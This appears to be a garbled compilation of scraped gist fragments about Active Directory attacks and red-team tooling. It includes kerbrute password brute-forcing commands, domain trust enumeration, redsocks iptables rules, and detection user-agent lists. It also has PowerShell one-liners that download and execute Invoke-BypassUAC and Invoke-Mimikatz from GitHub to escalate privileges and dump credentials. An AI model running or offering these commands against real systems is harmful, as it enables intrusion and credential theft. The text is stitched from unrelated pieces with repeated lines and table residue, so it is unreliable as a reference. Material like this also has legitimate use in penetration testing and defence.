With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts | |
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | |
Grab Forest Trusts. | |
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() | |
#!/bin/bash | |
# Create new chain | |
sudo iptables -t nat -N REDSOCKS | |
# Ignore LANs and some other reserved addresses. | |
sudo iptables -t nat -A REDSOCKS -d 0.0.0.0/8 -j RETURN | |
sudo iptables -t nat -A REDSOCKS -d 10.0.0.0/8 -j RETURN | |
sudo iptables -t nat -A REDSOCKS -d 127.0.0.0/8 -j RETURN | |
sudo iptables -t nat -A REDSOCKS -d 169.254.0.0/16 -j RETURN | |
sudo iptables -t nat -A REDSOCKS -d 172.16.0.0/12 -j RETURN |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
# New function naming schema: | |
# Verbs: | |
# Get : retrieve full raw data sets | |
# Find : ‘find’ specific data entries in a data set |
#Insall Ajenti ubuntu 18.04 | |
apt-get update | |
wget http://repo.ajenti.org/debian/key -O- | apt-key add - | |
echo "deb http://repo.ajenti.org/ng/debian main main ubuntu" >> /etc/apt/sources.list | |
apt-get update | |
# install python imaging | |
apt upgrade | |
apt-get install python-pillow | |
cd ~ | |
wget http://security.ubuntu.com/ubuntu/pool/universe/p/pillow/python-imaging_4.1.1-3build2_all.deb |
//Invoke-WebRequest in Powershell - manually whitelist legit content first: | |
Mozilla/*WindowsPowerShell/* | |
System.Net.WebClient.DownloadFile(): | |
None | |
//Start-BitsTransfer - manually whitelist legit content first: | |
Microsoft BITS/* | |
//certutil.exe - manually whitelist legit content first: |
_ _____ ___ __ __ ___ ____ ____ _____ ____ _____ _____ _ __ __ | |
/ \|_ _/ _ \| \/ |_ _/ ___| | _ \| ____| _ \ |_ _| ____| / \ | \/ | | |
/ _ \ | || | | | |\/| || | | | |_) | _| | | | | | | | _| / _ \ | |\/| | | |
/ ___ \| || |_| | | | || | |___ | _ <| |___| |_| | | | | |___ / ___ \| | | | | |
/_/ \_\_| \___/|_| |_|___\____| |_| \_\_____|____/ |_| |_____/_/ \_\_| |_| | |
[********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s) |
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Mimikatz Module to run further commands |